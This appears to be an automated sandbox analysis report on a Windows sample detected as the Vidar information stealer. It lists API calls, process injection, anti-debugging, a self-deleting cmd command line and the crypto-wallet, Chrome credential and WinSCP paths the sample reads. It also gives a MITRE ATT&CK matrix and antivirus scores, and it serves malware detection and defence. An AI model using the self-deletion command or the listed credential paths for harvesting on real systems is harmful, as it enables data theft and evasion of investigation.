Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257360113.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257360113.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: C:\Users\user\Desktop\file.exe

Code function: 2_2_00417648 __EH_prolog3_GS,CreateToolhelp32Snapshot,Process32First,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,Process32Next,CloseHandle,

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4656:120:WilError_01

Source: C:\Users\user\Desktop\file.exe	Command line argument: VirtualAlloc
Source: C:\Users\user\Desktop\file.exe	Command line argument: VirtualAllocEx
Source: C:\Users\user\Desktop\file.exe	Command line argument: kernel32.dll
Source: C:\Users\user\Desktop\file.exe	Command line argument: VirtualAlloc
Source: C:\Users\user\Desktop\file.exe	Command line argument: VirtualAllocEx
Source: C:\Users\user\Desktop\file.exe	Command line argument: kernel32.dll
Source: C:\Users\user\Desktop\file.exe	Command line argument: VirtualAlloc
Source: C:\Users\user\Desktop\file.exe	Command line argument: VirtualAllocEx
Source: C:\Users\user\Desktop\file.exe	Command line argument: kernel32.dll

Source: C:\Users\user\Desktop\file.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00428945 push ecx; ret
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004236AF push ecx; ret

Source: C:\Users\user\Desktop\file.exe

Code function: 2_2_0041A5D9 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,

Hooking and other Techniques for Hiding and Protection

Self deletion via cmd or bat file

Source: C:\Users\user\Desktop\file.exe	Process created: "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\file.exe" & exit
Source: C:\Users\user\Desktop\file.exe	Process created: "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\file.exe" & exit

Source: C:\Users\user\Desktop\file.exe

Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\SysWOW64\timeout.exe TID: 3636

Thread sleep count: 49 > 30

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe

Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 2_2_00416CDA __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,GetSystemInfo,

Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0040C3ED wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00412548 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004135E2 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,_memset,_memset,_memset,_memset,_memset,_memset,FindNextFileA,FindClose,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,_memset,_memset,_memset,_memset,_memset,_memset,
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00409DF4 wsprintfA,FindFirstFileA,_memset,lstrcat,StrCmpCA,StrCmpCA,lstrcpy,lstrcat,lstrcat,_memset,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlenA,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,PathMatchSpecA,CoInitialize,PathMatchSpecA,lstrcpy,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00411603 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,GetFileAttributesA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0040D624 _memset,lstrcat,wsprintfA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,GetFileAttributesA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00417F60 __EH_prolog3_GS,FindFirstFileW,FindNextFileW,
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004118D3 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00409284 __EH_prolog3_GS,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,_memset,lstrcat,lstrlenA,_memset,
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004132B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,StrCmpCA,StrCmpCA,DeleteFileA,FindNextFileA,FindClose,

Source: C:\Users\user\Desktop\file.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\

Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH.u%SystemRoot%\system32\mswsock.dll*
Source: file.exe, 00000002.00000002.245137168.000000000073C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00E82BB6 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

Source: C:\Users\user\Desktop\file.exe

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E82D4C SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E82BB6 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E8285E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0042A39A SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0041F69E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00426733 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00E8285E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00E82BB6 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00E82D4C SetUnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5A

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\file.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\file.exe	Code function: GetProcessHeap,HeapAlloc,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,_memset,LocalFree,
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,
Source: C:\Users\user\Desktop\file.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,
Source: C:\Users\user\Desktop\file.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,
Source: C:\Users\user\Desktop\file.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,
Source: C:\Users\user\Desktop\file.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
Source: C:\Users\user\Desktop\file.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,
Source: C:\Users\user\Desktop\file.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,
Source: C:\Users\user\Desktop\file.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
Source: C:\Users\user\Desktop\file.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoA,
Source: C:\Users\user\Desktop\file.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Users\user\Desktop\file.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
Source: C:\Users\user\Desktop\file.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Users\user\Desktop\file.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00E829D2 cpuid

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00E82E39 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

Source: C:\Users\user\Desktop\file.exe

Code function: 2_2_004174A0 __EH_prolog3_GS,GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,

Source: C:\Users\user\Desktop\file.exe

Code function: 2_2_0041717C GetUserNameA,

Stealing of Sensitive Information

Yara detected Vidar stealer

Source: Yara match	File source: 1.3.file.exe.526a20.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.file.exe.526a20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.7fb280.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.7fb280.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.231893309.000000000079A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.232045586.00000000004BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5896, type: MEMORYSTR

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\???[
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\???[
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\???[
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\???[
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\???[
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\???[
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\???[
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\???[
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\???[
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\???[
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\???[
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\???[
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ElectronCash
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: JaxxLiberty
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: info.seco
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Exodus\
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: passphrase.json
Source: file.exe, 00000002.00000002.245137168.000000000073C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\jaxx\Local Storage\file__0.localstorage5
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: file.exe	String found in binary or memory: Exodus Web3 Wallet
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default_wallet
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Ethereum"
Source: file.exe, 00000002.00000002.245137168.000000000073C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\jaxx\Local Storage\file__0.localstorage5
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MultiDoge
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: seed.seco
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Electrum-LTC\wallets\

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Source: Yara match	File source: 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5896, type: MEMORYSTR

Remote Access Functionality

Yara detected Vidar stealer

Source: Yara match	File source: 1.3.file.exe.526a20.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.file.exe.526a20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.7fb280.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.7fb280.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.231893309.000000000079A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.232045586.00000000004BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5896, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Command and Scripting Interpreter	Path Interception	111 Process Injection	1 Virtualization/Sandbox Evasion	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Screen Capture	Exfiltration Over Other Network Medium	21 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Native API	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	111 Process Injection	1 Credentials in Registry	21 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	3 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	3 Data from Local System	Automated Exfiltration	4 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	2 Obfuscated Files or Information	NTDS	12 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	115 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 File Deletion	LSA Secrets	1 Account Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	4 File and Directory Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	54 System Information Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	32%	ReversingLabs	Win32.Infostealer.Bandra
file.exe	37%	Virustotal		Browse
file.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
1.3.file.exe.526a20.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File
0.2.file.exe.7fb280.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
